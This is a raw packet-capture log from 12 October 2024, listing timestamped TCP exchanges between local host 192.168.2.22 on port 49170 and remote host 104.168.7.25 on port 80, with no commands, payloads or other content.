                                                                Oct 12, 2024 16:39:57.709011078 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709026098 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709027052 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709043026 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709053993 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709059954 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709073067 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709074974 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709088087 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709088087 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709105968 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709115028 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709115028 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709134102 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709152937 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709162951 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709177971 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709202051 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709208965 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709216118 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709218979 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709235907 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709238052 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709250927 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709258080 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709268093 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709283113 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709283113 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709290981 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709300995 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709306955 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709316969 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709321022 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709331989 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709342003 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709347010 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709355116 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709362984 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709374905 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709381104 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.709383011 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709403992 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709424019 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.709469080 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.764190912 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.764267921 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.764283895 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.764302969 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.764317989 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.764322996 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.764341116 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.764345884 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.764358997 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.764365911 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.764368057 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.764389038 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.764403105 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796232939 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796247959 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796262980 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796325922 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796334028 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796346903 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796363115 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796377897 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796394110 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796407938 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796411991 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796411991 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796425104 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796442986 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796447992 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796463966 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796468973 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796483040 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796495914 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796504974 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796521902 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796541929 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796544075 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796562910 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796565056 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796581030 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796591997 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796610117 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796619892 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796639919 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796641111 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796659946 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796672106 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796679020 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796693087 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796693087 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796700954 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796716928 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796720982 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796725988 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796746969 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796749115 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796749115 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796761990 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796765089 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796781063 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796797037 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796799898 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796824932 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796827078 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796834946 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796854019 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796869993 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796885014 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796900034 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796905041 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796916008 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796926022 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796937943 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796952963 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796960115 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796967983 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.796986103 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.796994925 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797003031 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797018051 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797044992 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797048092 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797055960 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797066927 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797080040 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797086000 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797105074 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797116041 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797121048 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797132015 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797152996 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797164917 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797200918 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797216892 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797230959 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797250032 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797251940 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797261000 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797278881 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797281981 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797295094 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797300100 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797316074 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797333956 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797352076 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797353029 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797362089 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797373056 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797380924 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797398090 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797410011 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797415018 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797429085 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797439098 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797458887 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797460079 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797477961 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797483921 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797503948 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797509909 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797528982 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797528982 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797555923 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797557116 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797573090 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797578096 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797599077 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797600031 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797620058 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797624111 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797645092 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797645092 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797662973 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797667980 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797689915 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797696114 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797713041 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797723055 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797743082 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797743082 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797763109 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797769070 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797785044 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797800064 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797806978 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797811985 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797830105 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797852039 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797854900 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797880888 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797897100 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797913074 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797928095 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797933102 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797936916 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797950983 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797954082 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797972918 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797975063 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.797995090 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.797995090 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798019886 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798022985 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798033953 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798048973 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798065901 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798069000 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798095942 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798096895 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798118114 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798118114 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798144102 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798161030 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798177004 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798192978 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798194885 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798204899 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798214912 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798228025 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798242092 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798245907 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798255920 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798264980 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798279047 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798294067 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798309088 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798315048 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798320055 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798336029 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798343897 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798357964 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798361063 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798377991 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798379898 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798399925 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798401117 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798407078 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798418999 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798434973 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798441887 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798443079 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798468113 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798471928 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798482895 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798490047 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798505068 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798521042 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798536062 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798541069 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798552990 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798562050 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798574924 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798582077 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798583031 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798603058 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798603058 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798618078 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798621893 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798639059 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798640966 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798661947 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798662901 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798686028 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798702955 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798703909 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798703909 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.798736095 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.798784018 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.853878975 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.853952885 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.853996992 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.854005098 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.854034901 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.854070902 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.854079962 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.854087114 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.854119062 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.854156017 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.854180098 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.854218960 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.892966986 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893012047 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893079042 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893106937 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893106937 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893125057 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893186092 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893192053 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893244982 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893275976 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893290043 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893305063 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893331051 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893345118 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893374920 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893392086 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893428087 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893435001 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893493891 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893496037 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893554926 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893557072 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893591881 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893610001 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893610954 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893629074 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893630981 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893646002 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893650055 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893663883 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893668890 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893691063 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893697977 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893712044 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893717051 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893737078 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893744946 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893760920 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893770933 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893783092 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893789053 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893805027 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893824100 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893837929 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893842936 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893846989 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893862009 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893862963 CEST8049170104.168.7.25192.168.2.22
                                                                Oct 12, 2024 16:39:57.893882036 CEST4917080192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:39:57.893882036 CEST8049170104.168.7.25192.168.2.22
